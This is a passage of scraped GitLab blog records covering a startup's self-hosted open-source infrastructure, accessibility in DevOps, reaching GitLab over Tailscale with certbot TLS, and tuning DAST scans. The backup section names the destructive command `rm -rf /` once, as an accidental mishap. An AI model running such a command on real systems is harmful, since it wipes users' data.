source consultant at the Eclipse Foundation Europe, and an active contributor to the OSPO Alliance._\n\nCover image by [Clay Banks](https://unsplash.com/@claybanks?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://www.unsplash.com)\n{: .note}\n\n",[9,752,685],{"slug":3014,"featured":6,"template":689},"how-start-ospo-ten-minutes-using-gitlab","content:en-us:blog:how-start-ospo-ten-minutes-using-gitlab.yml","How Start Ospo Ten Minutes Using Gitlab","en-us/blog/how-start-ospo-ten-minutes-using-gitlab.yml","en-us/blog/how-start-ospo-ten-minutes-using-gitlab",{"_path":3020,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3021,"content":3027,"config":3033,"_id":3035,"_type":14,"title":3036,"_source":16,"_file":3037,"_stem":3038,"_extension":19},"/en-us/blog/how-startups-build-it-infrastructure",{"title":3022,"description":3023,"ogTitle":3022,"ogDescription":3023,"noIndex":6,"ogImage":3024,"ogUrl":3025,"ogSiteName":673,"ogType":674,"canonicalUrls":3025,"schema":3026},"A way for startups to build a solid IT infrastructure","Seven free software solutions to cover your most important use cases.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679216/Blog/Hero%20Images/startups-it-infrastructure.jpg","https://about.gitlab.com/blog/how-startups-build-it-infrastructure","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A way for startups to build a solid IT infrastructure\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"plapadoo\"}],\n        \"datePublished\": \"2017-08-07\",\n      }",{"title":3022,"description":3023,"authors":3028,"heroImage":3024,"date":3030,"body":3031,"category":10,"tags":3032},[3029],"plapadoo","2017-08-07","\n\n *plapadoo is a software startup from Hannover, Germany, providing tailored, high-quality software engineering to their clients. They fill us in on how they chose solutions for their IT infrastructure, including communication, backups, [CI/CD](/topics/ci-cd/) and more.*\n\n\u003C!-- more -->\n\nWe recently founded [our company](https://plapadoo.de/) and so one of the first things to do was to get our infrastructure up and running. As a software startup, our technical infrastructure is the heart of our company. It influences our productivity, has impact on our costs and offers a great chance to set us apart from the competition. Having a good infrastructure is also key to saving us money and increasing development speed.\n\nWhen planning the setup of our infrastructure, we kept two things in mind: First, we wanted to have open source software running wherever possible, and second, we wanted to use strong encryption for both communication and data storage. Also, we prefer lightweight software with few dependencies. Below, you find a small list of important use cases and which software we use to cover them:\n\n- [Chat](#chat) ([Matrix](https://matrix.org/)/[Riot](https://about.riot.im/) web app + Android app)\n- [Email](#email) (self-hosted [Dovecot](https://www.dovecot.org/) + [Postfix](http://www.postfix.org/) + [Sieve](http://sieve.info/) + [SpamAssasin](http://spamassassin.apache.org/))\n- [Calendar and Contacts](#calendar-and-contacts) ([Radicale](http://radicale.org/))\n- [Voice Conferencing](#voice-conferencing) ([uMurmur](http://umurmur.net/)/[Mumble](https://wiki.mumble.info/))\n- [Synchronization of files across multiple devices](#data-storage) ([Syncthing](https://syncthing.net/))\n- [Git and Continuous Integration](#build-and-continuous-integration) ([GitLab](/stages-devops-lifecycle/) & [GitLab CI](/solutions/continuous-integration/))\n- [Backup and Traceability](#backup-and-traceability) ([borgmatic](https://github.com/witten/borgmatic) & [etckeeper](http://etckeeper.branchable.com/))\nBesides this, we have other services (like VPN or HTTP servers) running which are not that special and as such, are not covered on this article.\n\n## Base setup\n\nIt all starts with choosing the platform to run your software on. We decided to use [Arch Linux](https://www.archlinux.org/) as the operating system for our server. Our main reasons for choosing Arch Linux were its active community, good documentation, highly up-to-date repositories with current versions of important software, good support for disk encryption, and finally, the fact that Arch Linux has a rolling update scheme instead of a release-based one. This last point is especially important to us, since we do not want to go through the pain of upgrading our operating system from one version to the next every other year -  which usually causes lots of trouble. Furthermore, release-based distributions tend to have outdated software in their repositories. Instead, we prefer to keep our system always up to date and enjoy the latest version of any software any time.\n\nMost of our software is installed using Arch Linux’ package manager. However, in some cases [Docker](https://docker.com/) is also a good idea to use for running software. This is especially the case when software introduces dependencies you don’t want on your host system or if you are in doubt about the security of a software. Since Docker provides a certain level of isolation, security breaches don’t have as bad consequences as they have when you are running the vulnerable software directly on your host system. However, it should be kept in mind that there is the risk of a so-called container breakout. This basically means that your host system can be subject to an attack even if the vulnerable software is running inside a Docker container. Other reasons for using Docker can be wanting to try something out without messing up your host system or maybe software is simply not available for your Linux distribution. Of course, there are many other advantages to containerization, but we won’t be covering those today.\n\n## Communication\n\nCommunication, and using appropriate communication channels has been central to us since the very beginning. We wanted a means of communicating that was secure, fast, reliable, and easily accessible from any device. This applies to chat, email, contacts and calendar entries.\n\n### Chat\n\nFor chatting, we needed a solution which supported the concept of a “room” or “channel,” so as to keep discussions clear and separated from each other. We found Matrix/Synapse and Riot to be a perfect solution. While we also tried alternatives, such as Rocket.Chat and Mattermost, we liked Riot/Matrix the most because of its native Android app, its active development, and an open API.\n\nWe are using the Matrix API to run custom chat bots. These bots have become quite an important factor in our company, since they massively increase transparency and information distribution among the team. For example, we have bots to inform us about new commits being pushed to our GitLab server, new calendar entries being created in our shared calendar, successful or failed builds and so on. We will cover these bots in detail in an upcoming article.\n\n### Email\n\nSince we want to have complete control over the data belonging to our core business, we use a private mail server. It is indeed challenging to set up securely, but we still decided to go with it because of how important secure and private communication is to us. We had to read a lot of documentation before we could set it up, most importantly to prevent a security hole in the system. Not doing that would possibly mean ending up on a spammer blacklist, since someone could be abusing our mail server, or an attacker gaining access to our mail. It is a lot of work, but we definitely recommend taking the time to understand every step of the process and avoid any mistakes. On the client side, we seek to encrypt our emails using PGP whenever possible.\n\n### Calendar and contacts\n\nIn order to have a shared calendar as well as a shared address book, we are running Radicale, which is a lightweight CalDAV and CardDAV server. Although it is not easy to configure, it comes with support for Git and just quietly does its job in the background. We have never experienced any problems with this software so far and like it for its reliability. For Android and iOS, there are CalDAV and CardDAV adapters available to synchronize everything with your phone.\n\n### Voice Conferencing\n\nFor voice conferencing, it was very important to us to have a trustworthy open source solution in place. Proprietary solutions always come at the risk of backdoors being shipped along with them. We decided to give Mumble a try. Mumble is an open source voice client that requires a central server to handle all the traffic. The official server implementation is called Murmur. When installing Murmur, we learned that it pulls in a giant bunch of dependencies.\n\nAmong those dependencies are things such as X11 which most people don’t want on their servers. The problem with such dependencies is that they introduce potential attack surfaces as well as costing time, money, and other resources to maintain and update them. So you normally want as few dependencies as possible. This alone would make it a bad fit for us, but we still decided to give it a try. One option would have been to run Murmur inside a Docker container where the mentioned dependencies wouldn’t bother us too much. While we were configuring Murmur, we had to choose a server password. As always, we generated a long, strong password with about 60 random characters (including special characters). As we started the server and tried to connect a client, we were completely shocked. Murmur let clients in without requiring a password.\n\nWe found out that Murmur seems to have a problem with long passwords and then just ignores them. So if you configure Murmur with the goal of strong security, you get no security at all. Needless to say that we immediately uninstalled Murmur and all of the crazy dependencies it introduced.\nWhile looking for alternatives, we soon discovered uMurmur which is an alternative Mumble server implementation aiming at embedded systems. It comes with few dependencies and generally seems to be well implemented. We installed it, did not experience any issues with long passwords and have been using it ever since without any problem. The communication is encrypted using a TLS certificate.\n\n## Data storage\n\n![box files](https://about.gitlab.com/images/blogimages/startups-it-infrastructure-body.jpg){: .shadow}\n\nAnother important aspect within a company besides communication is the need to store and distribute documents among its different stakeholders.\nWhen sharing data, most programmers will normally use Git. However, Git is not to best choice for sharing binary data such as documents, photos, videos, etc., because one usually doesn’t need to keep different versions of these files. A common approach is to use ownCloud/NextCloud for data sharing, but since we really don’t like PHP, we precluded these two applications.\n\nInstead, we discovered Syncthing. Once you understand the concept of Syncthing, it is easy to set up, extremely easy to use and it just works out of the box. Syncthing can be described as a software which synchronizes data across several nodes. We have one Syncthing instance running on our server that acts as a kind of master node, although a master is not explicitly needed -  Syncthing is completely decentralized. We also run Syncthing on our desktops and phones. Each Syncthing node has a unique ID, which has to be added using the web interface of the master node in order to share data with them. For the local node, the unique ID of the master node has to be added accordingly. Using this concept of a master node, we don’t have to wire all our devices to each other -  it is enough to just wire each device to the master node.\n\nAfter that, you can select which folders should be shared using Syncthing. Syncthing will then automatically upload any new data you put into these folders to the remote node. Data added by other users is downloaded to the clients on the fly, and deletions of files, changes, etc. are also applied locally. For Android, there is a native Syncthing app available which does exactly the same. By using Syncthing, all our devices always have the latest version of the data stored inside the Syncthing shares on the master node.\n\n## Build and continuous integration\n\nFor Git and continuous integration, we use GitLab, which already comes with integrated CI features. Although GitLab is quite resource-hungry, it provides lots of very nice features such as an integrated issue tracker and the “snippets” area -  where you can paste code snippets and share them. GitLab is well documented and has an open API. It features webhooks that you can use to trigger HTTP requests whenever commits are pushed, CI pipelines start, and so on. We use that to generate notifications in matrix rooms corresponding to the Git repositories. So, for example, if someone pushes a commit to project “foo,” we get a notification in a Matrix room “room about foo,” which is linked to this project.\n\n>GitLab provides lots of very nice features such as an integrated issue tracker and the “snippets” area -  where you can paste code snippets and share them\n\nWe are using the official GitLab Docker image, which already includes [Prometheus](https://prometheus.io/) for monitoring. We are accessing this Prometheus instance from our host system and plot its data in a dedicated [Grafana](https://grafana.com/) dashboard. This way, we can monitor our GitLab server internals with very little effort.\n\nFor building a project using GitLab CI, you need a so-called “gitlab-runner” that acts as a build agent. There are also official Docker images available for those runners, but we have created our own Docker base image, which has some basic tools we constantly need. We use our custom base image to build individual runners for each project on top of it. This way, we have runners tailored exactly to the needs of our projects. Since the Docker socket is mapped into our runners, we can even build and deploy Docker images from within them.\n\nWe like the fact that the build jobs are defined through a “.gitlab-ci.yml” file that is versioned with each project. This way, you can track changes to the build process and always have a running build - even if you checkout an old version of a project.\n\n## Backup and traceability\n\nBacking up your data is very important. Especially nowadays with the widespread use of SSDs, when fatal disk failure is likely to happen. Other reasons for data loss may be accidental deletion or attacks. We are using [BorgBackup](https://borgbackup.readthedocs.io/) together with borgmatic, which is a nice, simple, incremental, and highly automatable backup solution. You can easily specify files to exclude from the backup, and also select how many daily, weekly, monthly and yearly backups you want Borg to keep. By setting up a Cron job or systemd timer, you can fully automate the backup process. We create backups every night and store them on an NFS storage, which is only mounted when the backup process is running. This way, we avoid the backup to be deleted by an accidental `rm -rf /` or some other mishap. Borg encrypts the backups and supports compression to keep your backups safe and small. We like to keep track of any changes we make to the system, especially those to configuration files.\n\nFor Linux, there is a useful little tool called etckeeper, which turns your `/etc` directory into a Git repository. It also adds hooks to your package manager to automatically commit any configuration changes being performed during system updates. Using etckeeper, every configuration change corresponds to a Git commit, with an author, a timestamp and a message. This provides for much more transparency, especially when more than one person administrates a server. Also, the way Git works, accidental changes are detected and bad configurations can be easily reverted.\n\n## Summary\n\nWe explained that we, at plapadoo, prefer lightweight (in terms of dependencies), focused software over bloated solutions and favor open source software. Our custom chat bot gives us a high level of transparency and awareness, and also improves our productivity, since we always know what’s going on, even if working remotely. Lastly, we explained which software solutions we have chosen for which use cases and why.\n\nIf you liked this article, please help us reach more readers by sharing it. If you have any questions, thoughts or recommendations on the topic, feel free to comment. Which software solutions did you choose for your startup?\n\n_This post was originally published on [Medium](https://medium.com/plapadoo/a-way-for-startups-to-build-a-solid-it-infrastructure-a48b222fbff6/)._\n\n[CERN reception, Meyrin, Switzerland](https://unsplash.com/@samuelzeller?photo=JuFcQxgCXwA) by [Samuel Zeller](https://unsplash.com/@samuelzeller) on Unsplash.\n{: .note}\n",[9,888,910],{"slug":3034,"featured":6,"template":689},"how-startups-build-it-infrastructure","content:en-us:blog:how-startups-build-it-infrastructure.yml","How Startups Build It Infrastructure","en-us/blog/how-startups-build-it-infrastructure.yml","en-us/blog/how-startups-build-it-infrastructure",{"_path":3040,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3041,"content":3047,"config":3052,"_id":3054,"_type":14,"title":3055,"_source":16,"_file":3056,"_stem":3057,"_extension":19},"/en-us/blog/how-the-devops-platform-makes-building-accessible-software-easier",{"title":3042,"description":3043,"ogTitle":3042,"ogDescription":3043,"noIndex":6,"ogImage":3044,"ogUrl":3045,"ogSiteName":673,"ogType":674,"canonicalUrls":3045,"schema":3046},"It's time to build more accessible software. A DevOps platform can help","Shifting accessibility left can make building accessible products simpler and more efficient. A DevOps platform makes it easier to customize and adjust priorities to suit your business needs.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667281/Blog/Hero%20Images/accessibility.jpg","https://about.gitlab.com/blog/how-the-devops-platform-makes-building-accessible-software-easier","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"It's time to build more accessible software. A DevOps platform can help\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2021-09-21\",\n      }",{"title":3042,"description":3043,"authors":3048,"heroImage":3044,"date":3049,"body":3050,"category":1119,"tags":3051},[927],"2021-09-21","\n\nThe earlier a feature or process is introduced in the multi-step software development lifecycle (SDLC), the more likely it is to be fully integrated into the product. \n\nIt's well documented how security can [shift left using a DevOps platform](/blog/devops-platform-supply-chain-attacks/), so it's time to make the case that accessbility needs to be thought about earlier (and, clearly, a DevOps platform can facilitate that too). Although there are laws that require applications to meet certain accessibility requirements, which [opens an application up to a broader user base](/blog/how-the-open-source-community-can-build-more-accessible-products/), rarely is accessibility considered a core product requirement. Instead, it is just a test tacked on at the end instead of being built into the DevOps platform process.\n\n**[Learn more about [how the open source development community helps build accessible software](/blog/how-the-open-source-community-can-build-more-accessible-products/)]**\n\n\"The problem really is that accessibility is not usually explicitly defined as a problem,\" said Segun Ola, a frontend web developer at engineering talent finder Andela, during a presentation at accessibility conference [axe-con](https://www.deque.com/axe-con/). \"Most of the time, developers go through the product lifecycle and we identify all the other problems with a product or all of the things we want to solve and ignore accessibility for the greater part.\"\n\n## Accessibility in software development: It starts with education\n\nOftentimes, omissions are unintentional and have more to do with a lack of awareness around why accessibility in software development is so important for many people living with disabilities and a key driver of business value. After all, the more accessible your product, the more users can benefit from it.\n\n\"I have met software engineers and designers who did not even know that there's a thing called a screen reader,\" Ola said. \"Just last week, I was reviewing some code and explaining why the code needed to be refactored. A junior engineer asked me ‘what is a screen reader?’ So I had to get on a call with him and show him how screen readers work. And then he asks me, ‘What's the point of a screen reader?’ And I had to tell him: ‘Oh yeah there are people who can't see the way you and I see.’\"\n\nThis is just one example of why having empathy and education around accessibility so important, says [Taurie Davis](/company/team/#tauriedavis), product design manager on Ecosystems at GitLab. Earlier in 2021, the GitLab UX team set a [goal to become a department of accessibility experts and advocates at GitLab](https://gitlab.com/groups/gitlab-org/-/epics/5235) by completing a 26-hour training at [Deque University](https://dequeuniversity.com/) on accessibility in software development.\n\n## Ignoring accessibility? Expect more technical debt\n\nSometimes software companies will see investment in accessibility components for a product as expensive and/or as a trade-off for innovation. Development teams that wait until the end of the SDLC to think about accessibility are more likely to have coded components that are inaccessible, only to have to go back and rework them to suit legal accessibility standards. This process can lead to an immense amount of technical debt.\n\n**Take a deep dive into [all aspects of the DevOps platform](/solutions/devops-platform/)**\n\n\"Once a team does start to become educated about accessibility and they have the empathy and have the drive to make the change and start shifting accessibility left it's easy to see all of the debt that you've accrued around accessibility,\" says Taurie. \"It can be really expensive to get yourself out of that debt.\" Taurie points to examples such as having to go back to change variables for color contrast, and ensuring that filtering and tab reordering can be done in a way that screen readers understand it.\n\n\"There are just so many different aspects and elements that could cause you to go back and just rewrite how the entire feature was originally developed and that can affect every aspect of your product,\" she adds.\n\n## Other barriers to implementing accessibility earlier\n\nFor UX designers like [Jeremy Elder](/company/team/#jeldergl), staff product designer on Ecosystems at GitLab, and Taurie, the typical workflow is about testing artifacts and responding to customer feedback, as opposed to thinking proactively about how someone might use the product.\n\n\"It’s more of a softer skill to think through a lot of those abstract ideas and what-ifs upfront rather than just saying, ‘Hey, we need this widget to do XYZ,’\" says Jeremy. \"Instead of asking questions like ‘how might somebody want to use this? How does it fit in their workflow?’. That is more inclusive thinking that helps you to do that, but it's harder and not as common.\"\n\n## Building accessible software isn’t just ethical, it drives business value\n\nOftentimes accessibility in software development is framed around building products to better serve people living with disabilities. While this is essential and ethical, accessibility can also be about building software products that can easily adapt to a user’s workflow.\n\n\"It’s more rigor around understanding workflows and how somebody is wanting to use it and less about focusing necessarily on a disability per se, or an outcome,\" says Jeremy. \"You want to think about personas or jobs to be done, not just think about the ultimate task, but how somebody is achieving that task.\"\n\n**[Ten key features](/topics/devops-platform/) of a DevOps platform**\n\nProducts that are customizable and adaptable are more likely to pique the interest of clients who have specific needs (e.g., a screenreader) or workflow preferences (e.g., using a particular type of keyboard).\n\n## What are the solutions?\n\nThe simplest solution to building more accessible software solutions is to think about accessibility at the beginning of the SDLC, rather than waiting until the end. Companies that use a complete DevOps platform like GitLab will find it simpler to take iterative steps toward shifting accessibility left. Need an example? Make accessibility part of the requirements a dev team needs to complete before a particular feature can be considered \"done.\" One way to do this would be to update issue templates and MR templates to ensure an accessibility step is part of the checklist.\n\nWhether it’s security or accessibility, shifting something left is about bringing the conversation to the beginning of the SDLC, something made much more straightforward with a DevOps platform. When it comes to accessibility, the more accessible the product is, the broader the pool of users (and future customers) can benefit.\n\n## Read more about the DevOps Platform:\n\n- [The journey to a DevOps Platform](/blog/the-journey-to-a-devops-platform/)\n\n- [How ten steps over ten years led to the DevOps Platform](/blog/how-ten-steps-over-ten-years-led-to-the-devops-platform/)\n\n- [Making the case for a DevOps platform: What data and customers say](/blog/making-the-case-for-a-devops-platform-what-data-and-customers-say/)\n\n- [Agile planning with a DevOps platform](/blog/agile-planning-with-a-devops-platform/)\n\n- [Welcome to the DevOps Platform era](/blog/welcome-to-the-devops-platform-era/)\n\n",[685,803,9],{"slug":3053,"featured":6,"template":689},"how-the-devops-platform-makes-building-accessible-software-easier","content:en-us:blog:how-the-devops-platform-makes-building-accessible-software-easier.yml","How The Devops Platform Makes Building Accessible Software Easier","en-us/blog/how-the-devops-platform-makes-building-accessible-software-easier.yml","en-us/blog/how-the-devops-platform-makes-building-accessible-software-easier",{"_path":3059,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3060,"content":3066,"config":3071,"_id":3073,"_type":14,"title":3074,"_source":16,"_file":3075,"_stem":3076,"_extension":19},"/en-us/blog/how-to-access-gitlab-on-a-private-network-with-tailscale",{"title":3061,"description":3062,"ogTitle":3061,"ogDescription":3062,"noIndex":6,"ogImage":3063,"ogUrl":3064,"ogSiteName":673,"ogType":674,"canonicalUrls":3064,"schema":3065},"How to access GitLab on a private network with Tailscale","If issues around a private network were preventing a permanent GitLab installation, Brendan O'Leary has the solution with Tailscale.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679348/Blog/Hero%20Images/locks.jpg","https://about.gitlab.com/blog/how-to-access-gitlab-on-a-private-network-with-tailscale","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to access GitLab on a private network with Tailscale\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brendan O'Leary\"}],\n        \"datePublished\": \"2022-07-21\",\n      }",{"title":3061,"description":3062,"authors":3067,"heroImage":3063,"date":3068,"body":3069,"category":801,"tags":3070},[1074],"2022-07-21","\nGitLab provides an easy-to-install package for most Linux distributions and even for devices like the [Raspberry Pi](https://docs.gitlab.com/omnibus/settings/rpi.html). However, if you want to install GitLab in a home lab or similar private network, you would then be faced with a new issue: how do you access the instance from outside that private network?\n\nTraditionally, you would set up your router to forward traffic from your public IP address to the server inside your network. However, this comes with several drawbacks:\n\n- Opening a port on your home or private network comes with a sustainable amount of risk.\n- It can be hard or impossible for folks to do depending on their internet service provider and what routing equipment they use.\n- It can be especially tough if your ISP doesn't provide you with a statically assigned IP address which means your address can change from time to time, and you'll need to either update DNS manually or through some third-party [dynamic DNS](https://www.cloudflare.com/learning/dns/glossary/dynamic-dns/) service.\n\nFor me, all of these challenges have meant that I've only ever really run GitLab \"for fun\" on my local network. Given the challenges above, running a permanent installation wasn't an option. That is until [Tailscale](https://tailscale.com) entered my life.\n\n## Tailscale\n\nTailscale isn't necessarily the \"newest\" technology. In fact, it is based on the [WireGuard protocol](https://www.wireguard.com/), which has existed in one form or another since 2015 and has seen native kernel support added to various Linux distributions as well as the kernel itself over the past several years.  Wireguard VPN technology makes considerable improvements in the usability and setup of virtual private networks over earlier protocols like IPsec. Even with being easier to use, the \"problem\" with WireGuard, at least for me, was always that it was still too complex to set up and maintain. Much like configuring my ISP's router for port forwarding, it wasn't _impossible_, but it just wasn't practical.\n\nEnter Tailscale. Tailscale provides a simple piece of client software, available for Linux, Mac, and Windows (and iOS and Android!), which implements the WireGuard protocol and allows you to control your VPN network from a handy web interface. Not only that, it's [free to use](https://tailscale.com/pricing/) for individuals and small networks. When I started using Tailscale, it was to make sure I could connect back to my home network and troubleshoot it while traveling for work. As the only system administrator in my house, this was fantastic.\n\nHowever, Tailscale also offers the ability to easily access services inside of various networks as well by setting up a mesh VPN between them, all with IP addresses in the 100.x.y.z range. That means for any web service or other service on my network, I can access it with a statically assigned IP address from any other device connected to Tailscale, and create a DNS record to have a domain point to the IP address. At last, I could run GitLab (and other open source tools) at home and safely connect to them from outside my house with as little hassle as possible. So how did I get it to work?\n\n## Tailscale and GitLab together\n\nAssuming you already have a GitLab [installation](/install/) up and running on your network, getting it working through Tailscale involves a few steps:\n\n- Installing Tailscale\n- Setting up DNS for the private address\n- Configuring HTTPS encryption\n\n### Installing Tailscale\n\nPackages are [available](https://tailscale.com/kb/1031/install-linux/) for many Linux distributions. To install Tailscale, you can select your [specific distribution](https://tailscale.com/kb/1031/install-linux/) for detailed instructions. There are also [static binaries](https://tailscale.com/kb/1053/install-static/) if you can't find your particular distribution - they are available for x86 and ARM CPUs for both 32- and 64-bit variants.\n\nOnce Tailscale is installed, getting it running is as simple as running the following command on the CLI:\n\n```bash\nsudo tailscale up\n```\n\nThe setup dialogue will walk you through the authentication process and get Tailscale running. After that process, you can see your new IP address for this node on your network with the CLI command `tailscale ip -4`. You'll need that IP address for the next steps.\n\nBy default, Tailscale will set an expiration date for the token it issues to your device during the authentication process. This is desirable for typical devices that may be transient or portable. However, suppose your device is secured inside your home or another secure place AND is a server you're not accessing all the time. In that case, you can optionally [disable key expiry](https://tailscale.com/kb/1028/key-expiry/) for that particular device.\n\n### Setting up DNS\n\nYou should be able to now access your device from any other Tailscale-connected device via the IP address from the last step. However, my goal was to make it easy for me to connect to GitLab, reference it by an URL, and encrypt the traffic end-to-end with TLS. As the next step I set up DNS.\n\nEven though the 100.x.y.z address is a private IP address, you can still create a public DNS record and have the hostname to point to it. That won't mean the whole world can access your server - it just means once you're connected to your Tailscale network, you can resolve that hostname to the IP address and access the web server. For me, I set up an A record for `gitpi.boleary.dev` to resolve to an IPv4 address:\n\n```\n;; QUESTION SECTION:\n;gitpi.boleary.dev.\t\tIN\tA\n\n;; ANSWER SECTION:\ngitpi.boleary.dev.\t300\tIN\tA\t100.64.205.40\n```\n\nAn important note here is that I use Cloudflare as my DNS provider - and I usually love Cloudflare's proxying service to make my \"real\" IP addresses private. In this case, you have to disable that proxying to make sure that you can resolve the correct address - Cloudflare can't proxy traffic into your Tailscale network.\n\n### Configuring HTTPS\n\nLastly, configuring HTTPS for your GitLab instance will ensure that all traffic is encrypted end-to-end. While Tailscale encrypts the traffic over the network, this will ensure there are no gaps between your device and your GitLab server.\n\nTo accomplish this, we'll use [`certbot`](https://certbot.eff.org/) from the EFF that lets us create and manage [Let's Encrypt](https://letsencrypt.org/) certificates. First, install `certbot` with `sudo apt install certbot` or follow the [instructions for your distribution](https://certbot.eff.org/instructions).\n\nAfter certbot is installed, issue a certificate to use with GitLab using a DNS challenge. Follow the steps to complete the DNS challenge after running this command:\n\n```bash\nsudo certbot certonly --manual --preferred-challenges dns\n```\n\nThe output will show you the specific location of the certificate it created (in my case, in a `gitpi.boleary.dev` folder), and you should link that certificate to GitLab's SSL directory by running:\n\n```bash\nsudo mkdir /etc/gitlab/ssl/\nsudo ln -s /etc/letsencrypt/live/gitpi.boleary.dev/fullchain.pem /etc/gitlab/ssl/gitpi.boleary.dev.crt\nsudo ln -s /etc/letsencrypt/live/gitpi.boleary.dev/privkey.pem /etc/gitlab/ssl/gitpi.boleary.dev.key\n```\n\nNext, configure GitLab to use the new certificate by opening the `gitlab.rb` with\n\n```bash\nsudo vi /etc/gitlab/gitlab.rb\n```\n\nAnd change the `external_url` value to match the URL for the certificate (e.g. `https://gitpi.boleary.dev`). That \"https\" will tell GitLab to enable TLS/SSL and use your linked certificate.\n\n## Finishing up\n\nThat's it! Now with a simple `gitlab-ctl reconfigure`, GitLab will pick up the new certificate and start responding to requests at that URL. From any device - iOS, Android, laptop, etc. - connected to your Tailscale network, you can access your GitLab installation (securely) from anywhere!\n",[752,9,231],{"slug":3072,"featured":6,"template":689},"how-to-access-gitlab-on-a-private-network-with-tailscale","content:en-us:blog:how-to-access-gitlab-on-a-private-network-with-tailscale.yml","How To Access Gitlab On A Private Network With Tailscale","en-us/blog/how-to-access-gitlab-on-a-private-network-with-tailscale.yml","en-us/blog/how-to-access-gitlab-on-a-private-network-with-tailscale",{"_path":3078,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3079,"content":3085,"config":3092,"_id":3094,"_type":14,"title":3095,"_source":16,"_file":3096,"_stem":3097,"_extension":19},"/en-us/blog/how-to-configure-dast-full-scans-for-complex-web-applications",{"title":3080,"description":3081,"ogTitle":3080,"ogDescription":3081,"noIndex":6,"ogImage":3082,"ogUrl":3083,"ogSiteName":673,"ogType":674,"canonicalUrls":3083,"schema":3084},"How to configure DAST full scans for complex web applications","Keep your DAST job within timeout limits and fine-tune job configurations for better results","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679617/Blog/Hero%20Images/tuning-237454.jpg","https://about.gitlab.com/blog/how-to-configure-dast-full-scans-for-complex-web-applications","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to configure DAST full scans for complex web applications\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dennis Appelt\"}],\n        \"datePublished\": \"2020-08-31\",\n      }",{"title":3080,"description":3081,"authors":3086,"heroImage":3082,"date":3088,"body":3089,"category":865,"tags":3090},[3087],"Dennis Appelt","2020-08-31","\n\nShifting [Dynamic Application Security Testing](https://docs.gitlab.com/ee/user/application_security/dast/) (DAST) left can help to detect security vulnerabilities earlier in the software development lifecycle (SDLC). However, testing earlier and more often in the SDLC comes with its own set of challenges: an abundance of alerts from automated security tools and a high computational cost caused by frequent and long-running CI security jobs.\n\nIn this blog post, I’ll walk you through how we configured DAST for the internal pipeline that tests the GitLab web application. We’ll discuss some of the common challenges that you might encounter when testing large applications, such as: \n\n1. How to keep the duration of the DAST scan within an acceptable [job timeout](https://docs.gitlab.com/ee/ci/pipelines/settings.html#timeout): This matters because jobs that exceed timeouts will fail and no results will be displayed. We will review how to optimize scan duration by excluding low-risk parts of the application from being tested, by correctly seeding your application with test data, and by parallelizing the DAST job.\n\n2. How to get relevant results for your context: This is key – tuning job configurations to produce relevant results allows your engineers to focus on findings that matter and prevents [alert fatigue](https://en.wikipedia.org/wiki/Alarm_fatigue). In this area, we'll discuss criteria for identifing rules that are applicable to your application and we will explain how to disable irrelevant rules.\n\nThe discussed solutions are based on the DAST configuration that we use to test GitLab itself. If you are looking for inspiration on how to configure your own DAST jobs, feel free to take a look at our [configuration](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/dast.gitlab-ci.yml).\n\n## How to set up a simple DAST full scan\n\nKicking off a DAST full scan in GitLab CI is as easy as including the job template and setting a few variables in your `.gitlab-ci.yml` file:\n\n```yaml\ninclude:\n  - template: DAST.gitlab-ci.yml\n\nvariables:\n  DAST_WEBSITE: \"https://my-site.example\"\n  DAST_FULL_SCAN_ENABLED: \"true\"\n  DAST_AUTH_URL: \"https://my-site.example/signin\"\n  DAST_AUTH_USERNAME: “john”\n  DAST_AUTH_PASSWORD: “P@ssw0rd”\n```\nThe variable `DAST_WEBSITE` defines the target website tested by DAST. Setting `DAST_FULL_SCAN_ENABLED: true` instructs DAST to run a [full scan](https://www.zaproxy.org/docs/docker/full-scan/), which is more comprehensive than a [baseline scan](https://www.zaproxy.org/docs/docker/baseline-scan/) and potentially finds more vulnerabilities. There are also other config options that you likely want to define such as authentication-related options (`DAST_AUTH_*`) which are not discussed here. You can check out our DAST [user docs](https://docs.gitlab.com/ee/user/application_security/dast/#available-variables) for a refresher on these config options.\n\nWhen running a DAST full scan against a web application with many pages and input parameters, it is possible that the DAST job will not finish testing the application within the CI job timeout and fail. If this is the case for your DAST job, keep reading to learn about tweaking your job configuration to stay within the timeout.\n\n## How to optimize DAST scan duration\n\nIt is not uncommon that a DAST full scan can take 10 or more hours to complete testing in complex applications. To understand how we can reduce the scan duration, we need to take a closer look at how DAST works internally.\n\nDAST job execution is roughly separated into two phases: A spidering phase and a test execution phase. A DAST job starts with spidering, during which it will detect all pages a web application consists of and identify the input parameters on these pages. The spider recursively discovers all pages of an application by visiting the configured target URL (parameter `DAST_WEBSITE`) and by following all URLs found in the page source. These URLs are in turn also searched for URLs in their page source, any new URLs are followed and so on. In a DAST full scan, this procedure is typically repeated until all discovered URLs have been visited.\n\nIn the test execution phase, test rules are executed against the target application to find vulnerabilities. Most of the rules are executed for any of the discovered pages in the spidering phase, leading to a direct relation between the number of executed test cases and the number of discovered pages.\n\nSome rules check for specific CVEs such as [Heartbleed](https://www.zaproxy.org/docs/alerts/20015/) while others are only applicable to applications written in specific languages such as [Java](https://www.zaproxy.org/docs/alerts/90002/), [ASP.net](https://www.zaproxy.org/docs/alerts/10061/), and so on. A DAST full scan will, by default, execute all rules even if the target application’s tech stack is not affected by the vulnerability being tested for.\n\nTo summarize, you can use the following rule of thumb to estimate a DAST job’s scan duration: Number of Tested Pages **x** 